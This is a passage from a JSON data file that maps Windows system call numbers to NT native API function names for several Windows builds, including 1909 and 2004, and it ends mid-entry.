"NtQueryInformationResourceManager", "327": "NtQueryInformationTransaction", "328": "NtQueryInformationTransactionManager", "329": "NtQueryInformationWorkerFactory", "330": "NtQueryInstallUILanguage", "331": "NtQueryIntervalProfile", "332": "NtQueryIoCompletion", "333": "NtQueryLicenseValue", "334": "NtQueryMultipleValueKey", "335": "NtQueryMutant", "336": "NtQueryOpenSubKeys", "337": "NtQueryOpenSubKeysEx", "338": "NtQueryPortInformationProcess", "339": "NtQueryQuotaInformationFile", "340": "NtQuerySecurityAttributesToken", "341": "NtQuerySecurityObject", "342": "NtQuerySecurityPolicy", "343": "NtQuerySemaphore", "344": "NtQuerySymbolicLinkObject", "345": "NtQuerySystemEnvironmentValue", "346": "NtQuerySystemEnvironmentValueEx", "347": "NtQuerySystemInformationEx", "348": "NtQueryTimerResolution", "349": "NtQueryWnfStateData", "350": "NtQueryWnfStateNameInformation", "351": "NtQueueApcThreadEx", "352": "NtRaiseException", "353": "NtRaiseHardError", "354": "NtReadOnlyEnlistment", "355": "NtRecoverEnlistment", "356": "NtRecoverResourceManager", "357": "NtRecoverTransactionManager", "358": "NtRegisterProtocolAddressInformation", "359": "NtRegisterThreadTerminatePort", "360": "NtReleaseKeyedEvent", "361": "NtReleaseWorkerFactoryWorker", "362": "NtRemoveIoCompletionEx", "363": "NtRemoveProcessDebug", "364": "NtRenameKey", "365": "NtRenameTransactionManager", "366": "NtReplaceKey", "367": "NtReplacePartitionUnit", "368": "NtReplyWaitReplyPort", "369": "NtRequestPort", "370": "NtResetEvent", "371": "NtResetWriteWatch", "372": "NtRestoreKey", "373": "NtResumeProcess", "374": "NtRevertContainerImpersonation", "375": "NtRollbackComplete", "376": "NtRollbackEnlistment", "377": "NtRollbackRegistryTransaction", "378": "NtRollbackTransaction", "379": "NtRollforwardTransactionManager", "380": "NtSaveKey", "381": "NtSaveKeyEx", "382": "NtSaveMergedKeys", "383": "NtSecureConnectPort", "384": "NtSerializeBoot", "385": "NtSetBootEntryOrder", "386": "NtSetBootOptions", "387": "NtSetCachedSigningLevel", "388": "NtSetCachedSigningLevel2", "389": "NtSetContextThread", "390": "NtSetDebugFilterState", "391": "NtSetDefaultHardErrorPort", "392": "NtSetDefaultLocale", "393": "NtSetDefaultUILanguage", "394": "NtSetDriverEntryOrder", "395": "NtSetEaFile", "396": "NtSetHighEventPair", "397": "NtSetHighWaitLowEventPair", "398": "NtSetIRTimer", "399": "NtSetInformationDebugObject", "400": "NtSetInformationEnlistment", "401": "NtSetInformationJobObject", "402": "NtSetInformationKey", "403": "NtSetInformationResourceManager", "404": "NtSetInformationSymbolicLink", "405": "NtSetInformationToken", "406": "NtSetInformationTransaction", "407": "NtSetInformationTransactionManager", "408": "NtSetInformationVirtualMemory", "409": "NtSetInformationWorkerFactory", "410": "NtSetIntervalProfile", "411": "NtSetIoCompletion", "412": "NtSetIoCompletionEx", "413": "NtSetLdtEntries", "414": "NtSetLowEventPair", "415": "NtSetLowWaitHighEventPair", "416": "NtSetQuotaInformationFile", "417": "NtSetSecurityObject", "418": "NtSetSystemEnvironmentValue", "419": "NtSetSystemEnvironmentValueEx", "420": "NtSetSystemInformation", "421": "NtSetSystemPowerState", "422": "NtSetSystemTime", "423": "NtSetThreadExecutionState", "424": "NtSetTimer2", "425": "NtSetTimerEx", "426": "NtSetTimerResolution", "427": "NtSetUuidSeed", "428": "NtSetVolumeInformationFile", "429": "NtSetWnfProcessNotificationEvent", "430": "NtShutdownSystem", "431": "NtShutdownWorkerFactory", "432": "NtSignalAndWaitForSingleObject", "433": "NtSinglePhaseReject", "434": "NtStartProfile", "435": "NtStopProfile", "436": "NtSubscribeWnfStateChange", "437": "NtSuspendProcess", "438": "NtSuspendThread", "439": "NtSystemDebugControl", "440": "NtTerminateEnclave", "441": "NtTerminateJobObject", "442": "NtTestAlert", "443": "NtThawRegistry", "444": "NtThawTransactions", "445": "NtTraceControl", "446": "NtTranslateFilePath", "447": "NtUmsThreadYield", "448": "NtUnloadDriver", "449": "NtUnloadKey", "450": "NtUnloadKey2", "451": "NtUnloadKeyEx", "452": "NtUnlockFile", "453": "NtUnlockVirtualMemory", "454": "NtUnmapViewOfSectionEx", "455": "NtUnsubscribeWnfStateChange", "456": "NtUpdateWnfStateData", "457": "NtVdmControl", "458": "NtWaitForAlertByThreadId", "459": "NtWaitForDebugEvent", "460": "NtWaitForKeyedEvent", "461": "NtWaitForWorkViaWorkerFactory", "462": "NtWaitHighEventPair", "463": "NtWaitLowEventPair"}, "1909": {"0": "NtAccessCheck", "1": "NtWorkerFactoryWorkerReady", "2": "NtAcceptConnectPort", "3": "NtMapUserPhysicalPagesScatter", "4": "NtWaitForSingleObject", "5": "NtCallbackReturn", "6": "NtReadFile", "7": "NtDeviceIoControlFile", "8": "NtWriteFile", "9": "NtRemoveIoCompletion", "10": "NtReleaseSemaphore", "11": "NtReplyWaitReceivePort", "12": "NtReplyPort", "13": "NtSetInformationThread", "14": "NtSetEvent", "15": "NtClose", "16": "NtQueryObject", "17": "NtQueryInformationFile", "18": "NtOpenKey", "19": "NtEnumerateValueKey", "20": "NtFindAtom", "21": "NtQueryDefaultLocale", "22": "NtQueryKey", "23": "NtQueryValueKey", "24": "NtAllocateVirtualMemory", "25": "NtQueryInformationProcess", "26": "NtWaitForMultipleObjects32", "27": "NtWriteFileGather", "28": "NtSetInformationProcess", "29": "NtCreateKey", "30": "NtFreeVirtualMemory", "31": "NtImpersonateClientOfPort", "32": "NtReleaseMutant", "33": "NtQueryInformationToken", "34": "NtRequestWaitReplyPort", "35": "NtQueryVirtualMemory", "36": "NtOpenThreadToken", "37": "NtQueryInformationThread", "38": "NtOpenProcess", "39": "NtSetInformationFile", "40": "NtMapViewOfSection", "41": "NtAccessCheckAndAuditAlarm", "42": "NtUnmapViewOfSection", "43": "NtReplyWaitReceivePortEx", "44": "NtTerminateProcess", "45": "NtSetEventBoostPriority", "46": "NtReadFileScatter", "47": "NtOpenThreadTokenEx", "48": "NtOpenProcessTokenEx", "49": "NtQueryPerformanceCounter", "50": "NtEnumerateKey", "51": "NtOpenFile", "52": "NtDelayExecution", "53": "NtQueryDirectoryFile", "54": "NtQuerySystemInformation", "55": "NtOpenSection", "56": "NtQueryTimer", "57": "NtFsControlFile", "58": "NtWriteVirtualMemory", "59": "NtCloseObjectAuditAlarm", "60": "NtDuplicateObject", "61": "NtQueryAttributesFile", "62": "NtClearEvent", "63": "NtReadVirtualMemory", "64": "NtOpenEvent", "65": "NtAdjustPrivilegesToken", "66": "NtDuplicateToken", "67": "NtContinue", "68": "NtQueryDefaultUILanguage", "69": "NtQueueApcThread", "70": "NtYieldExecution", "71": "NtAddAtom", "72": "NtCreateEvent", "73": "NtQueryVolumeInformationFile", "74": "NtCreateSection", "75": "NtFlushBuffersFile", "76": "NtApphelpCacheControl", "77": "NtCreateProcessEx", "78": "NtCreateThread", "79": "NtIsProcessInJob", "80": "NtProtectVirtualMemory", "81": "NtQuerySection", "82": "NtResumeThread", "83": "NtTerminateThread", "84": "NtReadRequestData", "85": "NtCreateFile", "86": "NtQueryEvent", "87": "NtWriteRequestData", "88": "NtOpenDirectoryObject", "89": "NtAccessCheckByTypeAndAuditAlarm", "90": "NtQuerySystemTime", "91": "NtWaitForMultipleObjects", "92": "NtSetInformationObject", "93": "NtCancelIoFile", "94": "NtTraceEvent", "95": "NtPowerInformation", "96": "NtSetValueKey", "97": "NtCancelTimer", "98": "NtSetTimer", "99": "NtAccessCheckByType", "100": "NtAccessCheckByTypeResultList", "101": "NtAccessCheckByTypeResultListAndAuditAlarm", "102": "NtAccessCheckByTypeResultListAndAuditAlarmByHandle", "103": "NtAcquireProcessActivityReference", "104": "NtAddAtomEx", "105": "NtAddBootEntry", "106": "NtAddDriverEntry", "107": "NtAdjustGroupsToken", "108": "NtAdjustTokenClaimsAndDeviceGroups", "109": "NtAlertResumeThread", "110": "NtAlertThread", "111": "NtAlertThreadByThreadId", "112": "NtAllocateLocallyUniqueId", "113": "NtAllocateReserveObject", "114": "NtAllocateUserPhysicalPages", "115": "NtAllocateUuids", "116": "NtAllocateVirtualMemoryEx", "117": "NtAlpcAcceptConnectPort", "118": "NtAlpcCancelMessage", "119": "NtAlpcConnectPort", "120": "NtAlpcConnectPortEx", "121": "NtAlpcCreatePort", "122": "NtAlpcCreatePortSection", "123": "NtAlpcCreateResourceReserve", "124": "NtAlpcCreateSectionView", "125": "NtAlpcCreateSecurityContext", "126": "NtAlpcDeletePortSection", "127": "NtAlpcDeleteResourceReserve", "128": "NtAlpcDeleteSectionView", "129": "NtAlpcDeleteSecurityContext", "130": "NtAlpcDisconnectPort", "131": "NtAlpcImpersonateClientContainerOfPort", "132": "NtAlpcImpersonateClientOfPort", "133": "NtAlpcOpenSenderProcess", "134": "NtAlpcOpenSenderThread", "135": "NtAlpcQueryInformation", "136": "NtAlpcQueryInformationMessage", "137": "NtAlpcRevokeSecurityContext", "138": "NtAlpcSendWaitReceivePort", "139": "NtAlpcSetInformation", "140": "NtAreMappedFilesTheSame", "141": "NtAssignProcessToJobObject", "142": "NtAssociateWaitCompletionPacket", "143": "NtCallEnclave", "144": "NtCancelIoFileEx", "145": "NtCancelSynchronousIoFile", "146": "NtCancelTimer2", "147": "NtCancelWaitCompletionPacket", "148": "NtCommitComplete", "149": "NtCommitEnlistment", "150": "NtCommitRegistryTransaction", "151": "NtCommitTransaction", "152": "NtCompactKeys", "153": "NtCompareObjects", "154": "NtCompareSigningLevels", "155": "NtCompareTokens", "156": "NtCompleteConnectPort", "157": "NtCompressKey", "158": "NtConnectPort", "159": "NtConvertBetweenAuxiliaryCounterAndPerformanceCounter", "160": "NtCreateCrossVmEvent", "161": "NtCreateDebugObject", "162": "NtCreateDirectoryObject", "163": "NtCreateDirectoryObjectEx", "164": "NtCreateEnclave", "165": "NtCreateEnlistment", "166": "NtCreateEventPair", "167": "NtCreateIRTimer", "168": "NtCreateIoCompletion", "169": "NtCreateJobObject", "170": "NtCreateJobSet", "171": "NtCreateKeyTransacted", "172": "NtCreateKeyedEvent", "173": "NtCreateLowBoxToken", "174": "NtCreateMailslotFile", "175": "NtCreateMutant", "176": "NtCreateNamedPipeFile", "177": "NtCreatePagingFile", "178": "NtCreatePartition", "179": "NtCreatePort", "180": "NtCreatePrivateNamespace", "181": "NtCreateProcess", "182": "NtCreateProfile", "183": "NtCreateProfileEx", "184": "NtCreateRegistryTransaction", "185": "NtCreateResourceManager", "186": "NtCreateSectionEx", "187": "NtCreateSemaphore", "188": "NtCreateSymbolicLinkObject", "189": "NtCreateThreadEx", "190": "NtCreateTimer", "191": "NtCreateTimer2", "192": "NtCreateToken", "193": "NtCreateTokenEx", "194": "NtCreateTransaction", "195": "NtCreateTransactionManager", "196": "NtCreateUserProcess", "197": "NtCreateWaitCompletionPacket", "198": "NtCreateWaitablePort", "199": "NtCreateWnfStateName", "200": "NtCreateWorkerFactory", "201": "NtDebugActiveProcess", "202": "NtDebugContinue", "203": "NtDeleteAtom", "204": "NtDeleteBootEntry", "205": "NtDeleteDriverEntry", "206": "NtDeleteFile", "207": "NtDeleteKey", "208": "NtDeleteObjectAuditAlarm", "209": "NtDeletePrivateNamespace", "210": "NtDeleteValueKey", "211": "NtDeleteWnfStateData", "212": "NtDeleteWnfStateName", "213": "NtDisableLastKnownGood", "214": "NtDisplayString", "215": "NtDrawText", "216": "NtEnableLastKnownGood", "217": "NtEnumerateBootEntries", "218": "NtEnumerateDriverEntries", "219": "NtEnumerateSystemEnvironmentValuesEx", "220": "NtEnumerateTransactionObject", "221": "NtExtendSection", "222": "NtFilterBootOption", "223": "NtFilterToken", "224": "NtFilterTokenEx", "225": "NtFlushBuffersFileEx", "226": "NtFlushInstallUILanguage", "227": "NtFlushInstructionCache", "228": "NtFlushKey", "229": "NtFlushProcessWriteBuffers", "230": "NtFlushVirtualMemory", "231": "NtFlushWriteBuffer", "232": "NtFreeUserPhysicalPages", "233": "NtFreezeRegistry", "234": "NtFreezeTransactions", "235": "NtGetCachedSigningLevel", "236": "NtGetCompleteWnfStateSubscription", "237": "NtGetContextThread", "238": "NtGetCurrentProcessorNumber", "239": "NtGetCurrentProcessorNumberEx", "240": "NtGetDevicePowerState", "241": "NtGetMUIRegistryInfo", "242": "NtGetNextProcess", "243": "NtGetNextThread", "244": "NtGetNlsSectionPtr", "245": "NtGetNotificationResourceManager", "246": "NtGetWriteWatch", "247": "NtImpersonateAnonymousToken", "248": "NtImpersonateThread", "249": "NtInitializeEnclave", "250": "NtInitializeNlsFiles", "251": "NtInitializeRegistry", "252": "NtInitiatePowerAction", "253": "NtIsSystemResumeAutomatic", "254": "NtIsUILanguageComitted", "255": "NtListenPort", "256": "NtLoadDriver", "257": "NtLoadEnclaveData", "258": "NtLoadKey", "259": "NtLoadKey2", "260": "NtLoadKeyEx", "261": "NtLockFile", "262": "NtLockProductActivationKeys", "263": "NtLockRegistryKey", "264": "NtLockVirtualMemory", "265": "NtMakePermanentObject", "266": "NtMakeTemporaryObject", "267": "NtManageHotPatch", "268": "NtManagePartition", "269": "NtMapCMFModule", "270": "NtMapUserPhysicalPages", "271": "NtMapViewOfSectionEx", "272": "NtModifyBootEntry", "273": "NtModifyDriverEntry", "274": "NtNotifyChangeDirectoryFile", "275": "NtNotifyChangeDirectoryFileEx", "276": "NtNotifyChangeKey", "277": "NtNotifyChangeMultipleKeys", "278": "NtNotifyChangeSession", "279": "NtOpenEnlistment", "280": "NtOpenEventPair", "281": "NtOpenIoCompletion", "282": "NtOpenJobObject", "283": "NtOpenKeyEx", "284": "NtOpenKeyTransacted", "285": "NtOpenKeyTransactedEx", "286": "NtOpenKeyedEvent", "287": "NtOpenMutant", "288": "NtOpenObjectAuditAlarm", "289": "NtOpenPartition", "290": "NtOpenPrivateNamespace", "291": "NtOpenProcessToken", "292": "NtOpenRegistryTransaction", "293": "NtOpenResourceManager", "294": "NtOpenSemaphore", "295": "NtOpenSession", "296": "NtOpenSymbolicLinkObject", "297": "NtOpenThread", "298": "NtOpenTimer", "299": "NtOpenTransaction", "300": "NtOpenTransactionManager", "301": "NtPlugPlayControl", "302": "NtPrePrepareComplete", "303": "NtPrePrepareEnlistment", "304": "NtPrepareComplete", "305": "NtPrepareEnlistment", "306": "NtPrivilegeCheck", "307": "NtPrivilegeObjectAuditAlarm", "308": "NtPrivilegedServiceAuditAlarm", "309": "NtPropagationComplete", "310": "NtPropagationFailed", "311": "NtPulseEvent", "312": "NtQueryAuxiliaryCounterFrequency", "313": "NtQueryBootEntryOrder", "314": "NtQueryBootOptions", "315": "NtQueryDebugFilterState", "316": "NtQueryDirectoryFileEx", "317": "NtQueryDirectoryObject", "318": "NtQueryDriverEntryOrder", "319": "NtQueryEaFile", "320": "NtQueryFullAttributesFile", "321": "NtQueryInformationAtom", "322": "NtQueryInformationByName", "323": "NtQueryInformationEnlistment", "324": "NtQueryInformationJobObject", "325": "NtQueryInformationPort", "326": "NtQueryInformationResourceManager", "327": "NtQueryInformationTransaction", "328": "NtQueryInformationTransactionManager", "329": "NtQueryInformationWorkerFactory", "330": "NtQueryInstallUILanguage", "331": "NtQueryIntervalProfile", "332": "NtQueryIoCompletion", "333": "NtQueryLicenseValue", "334": "NtQueryMultipleValueKey", "335": "NtQueryMutant", "336": "NtQueryOpenSubKeys", "337": "NtQueryOpenSubKeysEx", "338": "NtQueryPortInformationProcess", "339": "NtQueryQuotaInformationFile", "340": "NtQuerySecurityAttributesToken", "341": "NtQuerySecurityObject", "342": "NtQuerySecurityPolicy", "343": "NtQuerySemaphore", "344": "NtQuerySymbolicLinkObject", "345": "NtQuerySystemEnvironmentValue", "346": "NtQuerySystemEnvironmentValueEx", "347": "NtQuerySystemInformationEx", "348": "NtQueryTimerResolution", "349": "NtQueryWnfStateData", "350": "NtQueryWnfStateNameInformation", "351": "NtQueueApcThreadEx", "352": "NtRaiseException", "353": "NtRaiseHardError", "354": "NtReadOnlyEnlistment", "355": "NtRecoverEnlistment", "356": "NtRecoverResourceManager", "357": "NtRecoverTransactionManager", "358": "NtRegisterProtocolAddressInformation", "359": "NtRegisterThreadTerminatePort", "360": "NtReleaseKeyedEvent", "361": "NtReleaseWorkerFactoryWorker", "362": "NtRemoveIoCompletionEx", "363": "NtRemoveProcessDebug", "364": "NtRenameKey", "365": "NtRenameTransactionManager", "366": "NtReplaceKey", "367": "NtReplacePartitionUnit", "368": "NtReplyWaitReplyPort", "369": "NtRequestPort", "370": "NtResetEvent", "371": "NtResetWriteWatch", "372": "NtRestoreKey", "373": "NtResumeProcess", "374": "NtRevertContainerImpersonation", "375": "NtRollbackComplete", "376": "NtRollbackEnlistment", "377": "NtRollbackRegistryTransaction", "378": "NtRollbackTransaction", "379": "NtRollforwardTransactionManager", "380": "NtSaveKey", "381": "NtSaveKeyEx", "382": "NtSaveMergedKeys", "383": "NtSecureConnectPort", "384": "NtSerializeBoot", "385": "NtSetBootEntryOrder", "386": "NtSetBootOptions", "387": "NtSetCachedSigningLevel", "388": "NtSetCachedSigningLevel2", "389": "NtSetContextThread", "390": "NtSetDebugFilterState", "391": "NtSetDefaultHardErrorPort", "392": "NtSetDefaultLocale", "393": "NtSetDefaultUILanguage", "394": "NtSetDriverEntryOrder", "395": "NtSetEaFile", "396": "NtSetHighEventPair", "397": "NtSetHighWaitLowEventPair", "398": "NtSetIRTimer", "399": "NtSetInformationDebugObject", "400": "NtSetInformationEnlistment", "401": "NtSetInformationJobObject", "402": "NtSetInformationKey", "403": "NtSetInformationResourceManager", "404": "NtSetInformationSymbolicLink", "405": "NtSetInformationToken", "406": "NtSetInformationTransaction", "407": "NtSetInformationTransactionManager", "408": "NtSetInformationVirtualMemory", "409": "NtSetInformationWorkerFactory", "410": "NtSetIntervalProfile", "411": "NtSetIoCompletion", "412": "NtSetIoCompletionEx", "413": "NtSetLdtEntries", "414": "NtSetLowEventPair", "415": "NtSetLowWaitHighEventPair", "416": "NtSetQuotaInformationFile", "417": "NtSetSecurityObject", "418": "NtSetSystemEnvironmentValue", "419": "NtSetSystemEnvironmentValueEx", "420": "NtSetSystemInformation", "421": "NtSetSystemPowerState", "422": "NtSetSystemTime", "423": "NtSetThreadExecutionState", "424": "NtSetTimer2", "425": "NtSetTimerEx", "426": "NtSetTimerResolution", "427": "NtSetUuidSeed", "428": "NtSetVolumeInformationFile", "429": "NtSetWnfProcessNotificationEvent", "430": "NtShutdownSystem", "431": "NtShutdownWorkerFactory", "432": "NtSignalAndWaitForSingleObject", "433": "NtSinglePhaseReject", "434": "NtStartProfile", "435": "NtStopProfile", "436": "NtSubscribeWnfStateChange", "437": "NtSuspendProcess", "438": "NtSuspendThread", "439": "NtSystemDebugControl", "440": "NtTerminateEnclave", "441": "NtTerminateJobObject", "442": "NtTestAlert", "443": "NtThawRegistry", "444": "NtThawTransactions", "445": "NtTraceControl", "446": "NtTranslateFilePath", "447": "NtUmsThreadYield", "448": "NtUnloadDriver", "449": "NtUnloadKey", "450": "NtUnloadKey2", "451": "NtUnloadKeyEx", "452": "NtUnlockFile", "453": "NtUnlockVirtualMemory", "454": "NtUnmapViewOfSectionEx", "455": "NtUnsubscribeWnfStateChange", "456": "NtUpdateWnfStateData", "457": "NtVdmControl", "458": "NtWaitForAlertByThreadId", "459": "NtWaitForDebugEvent", "460": "NtWaitForKeyedEvent", "461": "NtWaitForWorkViaWorkerFactory", "462": "NtWaitHighEventPair", "463": "NtWaitLowEventPair"}, "2004": {"0": "NtAccessCheck", "1": "NtWorkerFactoryWorkerReady", "2": "NtAcceptConnectPort", "3": "NtMapUserPhysicalPagesScatter", "4": "NtWaitForSingleObject", "5": "NtCallbackReturn", "6": "NtReadFile", "7": "NtDeviceIoControlFile", "8": "NtWriteFile", "9": "NtRemoveIoCompletion", "10": "NtReleaseSemaphore", "11": "NtReplyWaitReceivePort", "12": "NtReplyPort", "13": "NtSetInformationThread", "14": "NtSetEvent", "15": "NtClose", "16": "NtQueryObject", "17": "NtQueryInformationFile", "18": "NtOpenKey", "19": "NtEnumerateValueKey", "20": "NtFindAtom", "21": "NtQueryDefaultLocale", "22": "NtQueryKey", "23": "NtQueryValueKey", "24": "NtAllocateVirtualMemory", "25": "NtQueryInformationProcess", "26": "NtWaitForMultipleObjects32", "27": "NtWriteFileGather", "28": "NtSetInformationProcess", "29": "NtCreateKey", "30": "NtFreeVirtualMemory", "31": "NtImpersonateClientOfPort", "32": "NtReleaseMutant", "33": "NtQueryInformationToken", "34": "NtRequestWaitReplyPort", "35": "NtQueryVirtualMemory", "36": "NtOpenThreadToken", "37": "NtQueryInformationThread", "38": "NtOpenProcess", "39": "NtSetInformationFile", "40": "NtMapViewOfSection", "41": "NtAccessCheckAndAuditAlarm", "42": "NtUnmapViewOfSection", "43": "NtReplyWaitReceivePortEx", "44": "NtTerminateProcess", "45": "NtSetEventBoostPriority", "46": "NtReadFileScatter", "47": "NtOpenThreadTokenEx", "48": "NtOpenProcessTokenEx", "49": "NtQueryPerformanceCounter", "50": "NtEnumerateKey", "51": "NtOpenFile", "52": "NtDelayExecution", "53": "NtQueryDirectoryFile", "54": "NtQuerySystemInformation", "55": "NtOpenSection", "56": "NtQueryTimer", "57": "NtFsControlFile", "58": "NtWriteVirtualMemory", "59": "NtCloseObjectAuditAlarm", "60": "NtDuplicateObject", "61": "NtQueryAttributesFile", "62": "NtClearEvent", "63": "NtReadVirtualMemory", "64": "NtOpenEvent", "65": "NtAdjustPrivilegesToken", "66": "NtDuplicateToken", "67": "NtContinue", "68": "NtQueryDefaultUILanguage", "69": "NtQueueApcThread", "70": "NtYieldExecution", "71": "NtAddAtom", "72": "NtCreateEvent", "73": "NtQueryVolumeInformationFile", "74": "NtCreateSection", "75": "NtFlushBuffersFile", "76": "NtApphelpCacheControl", "77": "NtCreateProcessEx", "78": "NtCreateThread", "79": "NtIsProcessInJob", "80": "NtProtectVirtualMemory", "81": "NtQuerySection", "82": "NtResumeThread", "83": "NtTerminateThread", "84": "NtReadRequestData", "85": "NtCreateFile", "86": "NtQueryEvent", "87": "NtWriteRequestData", "88": "NtOpenDirectoryObject", "89": "NtAccessCheckByTypeAndAuditAlarm", "90": "NtQuerySystemTime", "91": "NtWaitForMultipleObjects", "92": "NtSetInformationObject", "93": "NtCancelIoFile", "94": "NtTraceEvent", "95": "NtPowerInformation", "96": "NtSetValueKey", "97": "NtCancelTimer", "98": "NtSetTimer", "99": "NtAccessCheckByType", "100": "NtAccessCheckByTypeResultList", "101": "NtAccessCheckByTypeResultListAndAuditAlarm", "102": "NtAccessCheckByTypeResultListAndAuditAlarmByHandle", "103": "NtAcquireCrossVmMutant", "104": "NtAcquireProcessActivityReference", "105": "NtAddAtomEx", "106": "NtAddBootEntry", "107": "NtAddDriverEntry", "108": "NtAdjustGroupsToken", "109": "NtAdjustTokenClaimsAndDeviceGroups", "110": "NtAlertResumeThread", "111": "NtAlertThread", "112": "NtAlertThreadByThreadId", "113": "NtAllocateLocallyUniqueId", "114": "NtAllocateReserveObject", "115": "NtAllocateUserPhysicalPages", "116": "NtAllocateUserPhysicalPagesEx", "117": "NtAllocateUuids", "118": "NtAllocateVirtualMemoryEx", "119": "NtAlpcAcceptConnectPort", "120": "NtAlpcCancelMessage", "121": "NtAlpcConnectPort", "122": "NtAlpcConnectPortEx", "123": "NtAlpcCreatePort", "124": "NtAlpcCreatePortSection", "125": "NtAlpcCreateResourceReserve", "126": "NtAlpcCreateSectionView", "127": "NtAlpcCreateSecurityContext", "128": "NtAlpcDeletePortSection", "129": "NtAlpcDeleteResourceReserve", "130": "NtAlpcDeleteSectionView", "131": "NtAlpcDeleteSecurityContext", "132": "NtAlpcDisconnectPort", "133": "NtAlpcImpersonateClientContainerOfPort", "134": "NtAlpcImpersonateClientOfPort", "135": "NtAlpcOpenSenderProcess", "136": "NtAlpcOpenSenderThread", "137": "NtAlpcQueryInformation", "138": "NtAlpcQueryInformationMessage", "139": "NtAlpcRevokeSecurityContext", "140": "NtAlpcSendWaitReceivePort", "141": "NtAlpcSetInformation", "142": "NtAreMappedFilesTheSame", "143": "NtAssignProcessToJobObject", "144": "NtAssociateWaitCompletionPacket", "145": "NtCallEnclave", "146": "NtCancelIoFileEx", "147": "NtCancelSynchronousIoFile", "148": "NtCancelTimer2", "149": "NtCancelWaitCompletionPacket", "150": "NtCommitComplete", "151": "NtCommitEnlistment", "152": "NtCommitRegistryTransaction", "153": "NtCommitTransaction", "154": "NtCompactKeys", "155": "NtCompareObjects", "156": "NtCompareSigningLevels", "157": "NtCompareTokens", "158": "NtCompleteConnectPort", "159": "NtCompressKey", "160": "NtConnectPort", "161": "NtContinueEx", "162": "NtConvertBetweenAuxiliaryCounterAndPerformanceCounter", "163": "NtCreateCrossVmEvent", "164": "NtCreateCrossVmMutant", "165": "NtCreateDebugObject", "166": "NtCreateDirectoryObject", "167": "NtCreateDirectoryObjectEx", "168": "NtCreateEnclave", "169": "NtCreateEnlistment", "170": "NtCreateEventPair", "171": "NtCreateIRTimer", "172": "NtCreateIoCompletion", "173": "NtCreateJobObject", "174": "NtCreateJobSet", "175": "NtCreateKeyTransacted", "176": "NtCreateKeyedEvent", "177": "NtCreateLowBoxToken", "178": "NtCreateMailslotFile", "179": "NtCreateMutant", "180": "NtCreateNamedPipeFile", "181": "NtCreatePagingFile", "182": "NtCreatePartition", "183": "NtCreatePort", "184": "NtCreatePrivateNamespace", "185": "NtCreateProcess", "186": "NtCreateProfile", "187": "NtCreateProfileEx", "188": "NtCreateRegistryTransaction", "189": "NtCreateResourceManager", "190": "NtCreateSectionEx", "191": "NtCreateSemaphore", "192": "NtCreateSymbolicLinkObject", "193": "NtCreateThreadEx", "194": "NtCreateTimer", "195": "NtCreateTimer2", "196": "NtCreateToken", "197": "NtCreateTokenEx", "198": "NtCreateTransaction", "199": "NtCreateTransactionManager", "200": "NtCreateUserProcess", "201": "NtCreateWaitCompletionPacket", "202": "NtCreateWaitablePort", "203": "NtCreateWnfStateName", "204": "NtCreateWorkerFactory", "205": "NtDebugActiveProcess", "206": "NtDebugContinue", "207": "NtDeleteAtom", "208": "NtDeleteBootEntry", "209": "NtDeleteDriverEntry", "210": "NtDeleteFile", "211": "NtDeleteKey", "212": "NtDeleteObjectAuditAlarm", "213": "NtDeletePrivateNamespace", "214": "NtDeleteValueKey", "215": "NtDeleteWnfStateData", "216": "NtDeleteWnfStateName", "217": "NtDirectGraphicsCall", "218": "NtDisableLastKnownGood", "219": "NtDisplayString", "220": "NtDrawText", "221": "NtEnableLastKnownGood", "222": "NtEnumerateBootEntries", "223": "NtEnumerateDriverEntries", "224": "NtEnumerateSystemEnvironmentValuesEx", "225": "NtEnumerateTransactionObject", "226": "NtExtendSection", "227": "NtFilterBootOption", "228": "NtFilterToken", "229": "NtFilterTokenEx", "230": "NtFlushBuffersFileEx", "231": "NtFlushInstallUILanguage", "232": "NtFlushInstructionCache", "233": "NtFlushKey", "234": "NtFlushProcessWriteBuffers", "235": "NtFlushVirtualMemory", "236": "NtFlushWriteBuffer", "237": "NtFreeUserPhysicalPages", "238": "NtFreezeRegistry", "239": "NtFreezeTransactions", "240": "NtGetCachedSigningLevel", "241": "NtGetCompleteWnfStateSubscription", "242": "NtGetContextThread", "243": "NtGetCurrentProcessorNumber", "244": "NtGetCurrentProcessorNumberEx", "245": "NtGetDevicePowerState", "246": "NtGetMUIRegistryInfo", "247": "NtGetNextProcess", "248": "NtGetNextThread", "249": "NtGetNlsSectionPtr", "250": "NtGetNotificationResourceManager", "251": "NtGetWriteWatch", "252": "NtImpersonateAnonymousToken", "253": "NtImpersonateThread", "254": "NtInitializeEnclave", "255": "NtInitializeNlsFiles", "256": "NtInitializeRegistry", "257": "NtInitiatePowerAction", "258": "NtIsSystemResumeAutomatic", "259": "NtIsUILanguageComitted", "260": "NtListenPort", "261": "NtLoadDriver", "262": "NtLoadEnclaveData", "263": "NtLoadKey", "264": "NtLoadKey2", "265": "NtLoadKeyEx", "266": "NtLockFile", "267": "NtLockProductActivationKeys", "268": "NtLockRegistryKey", "269": "NtLockVirtualMemory", "270": "NtMakePermanentObject", "271": "NtMakeTemporaryObject", "272": "NtManageHotPatch", "273": "NtManagePartition", "274": "NtMapCMFModule", "275": "NtMapUserPhysicalPages", "276": "NtMapViewOfSectionEx", "277": "NtModifyBootEntry", "278": "NtModifyDriverEntry", "279": "NtNotifyChangeDirectoryFile", "280": "NtNotifyChangeDirectoryFileEx", "281": "NtNotifyChangeKey", "282": "NtNotifyChangeMultipleKeys", "283": "NtNotifyChangeSession", "284": "NtOpenEnlistment", "285": "NtOpenEventPair", "286": "NtOpenIoCompletion", "287": "NtOpenJobObject", "288": "NtOpenKeyEx", "289": "NtOpenKeyTransacted", "290": "NtOpenKeyTransactedEx", "291": "NtOpenKeyedEvent", "292": "NtOpenMutant", "293": "NtOpenObjectAuditAlarm", "294": "NtOpenPartition", "295": "NtOpenPrivateNamespace", "296": "NtOpenProcessToken", "297": "NtOpenRegistryTransaction", "298": "NtOpenResourceManager", "299": "NtOpenSemaphore", "300": "NtOpenSession", "301": "NtOpenSymbolicLinkObject", "302": "NtOpenThread", "303": "NtOpenTimer", "304": "NtOpenTransaction", "305": "NtOpenTransactionManager", "306": "NtPlugPlayControl", "307": "NtPrePrepareComplete", "308": "NtPrePrepareEnlistment", "309": "NtPrepareComplete", "310": "NtPrepareEnlistment", "311": "NtPrivilegeCheck", "312": "NtPrivilegeObjectAuditAlarm", "313": "NtPrivilegedServiceAuditAlarm", "314": "NtPropagationComplete", "315": "NtPropagationFailed", "316": "NtPssCaptureVaSpaceBulk", "317": "NtPulseEvent", "318": "NtQueryAuxiliaryCounterFrequency", "319": "NtQueryBootEntryOrder", "320": "NtQueryBootOptions", "321": 